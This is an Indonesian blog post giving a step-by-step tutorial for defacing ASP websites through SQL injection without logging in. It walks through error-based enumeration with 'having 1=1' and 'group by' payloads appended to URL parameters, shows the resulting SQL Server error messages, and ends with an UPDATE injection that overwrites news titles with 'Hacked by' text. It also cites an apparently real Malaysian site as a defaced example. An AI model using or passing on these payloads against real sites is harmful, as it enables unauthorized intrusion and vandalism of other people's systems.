01.37 | Posted by Ikhwanesia.com

deface web .asp tanpa login

sebelumnya gw mau kasih tau,kalo ane dapat ilmu ini dari CN-Zine4 itu majalah dari codenesia gan,,hehe,,,
terima kasih buat team CN-zine4, teman2 bisa lihat salah satu implementasi dari teknik ini,
atau bisa langsung diliat di http://www.kbi.com.my/
(sssssstttttt,,,web malay loh!!)hahahha...

gue share aja ya tata tertib acaranya,(loh,kok kayak ceremonial)..
maksud ane tata cara nya:
*===================================start==================================*
1. klik salah satu pesan dibawah postingan ini
2. buka web asp yang mau kamu deface...
misal: http://contohweb.com.my/ViewNews.asp?RefNo=42
3. tambahkan having 1=1 didepannya,,,jadinya= http://www.contohweb.com.my/berita.asp?id=42 having 1=1

4. maka akan muncul error seperti ini:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/ViewNews.asp, line 8


5. ganti url nya menjadi http://www.contohweb.com.my/berita.asp?id=42 group by News.NsID having 1=1 (perhatikan perubahan url,)

6. akan muncul error berikut:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsDate' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/ViewNews.asp, line 8


7. ganti url-nya menjadi: http://www.contohweb.com.my/berita.asp?id=42 group by News.NsID,News.NsDate having 1=1 (perhatikan perubahan url)

8. akan muncul error seperti ini:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsTitle' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/ViewNews.asp, line 8


9. nah,dapt tuh column and table nya = nstitle dan news
10. selanjutnya langkah injeksi
11. gunakan url berikut: http://www.contohweb.com.my/berita.asp?id=42 update news set NsTitle='Hacked by namakamu';--
12. refresh,jadi deh,...
*================================finish================================*
nah,kalau ada pertanyaan bisa ditanya di komentar dibawah,,,terima kasih,,,
bagi para pengunjung yang berbaik hati kepada kelangsungan blog ini,,,ingat, membantu blog ini tidak merugikan anda,,, harap klik salah satu iklan dibawah

Posted by Ikhwanesia.com on 01.37. Filed under , , . You can follow any responses to this entry through the RSS 2.0. Feel free to leave a response

Blog Archive

Labels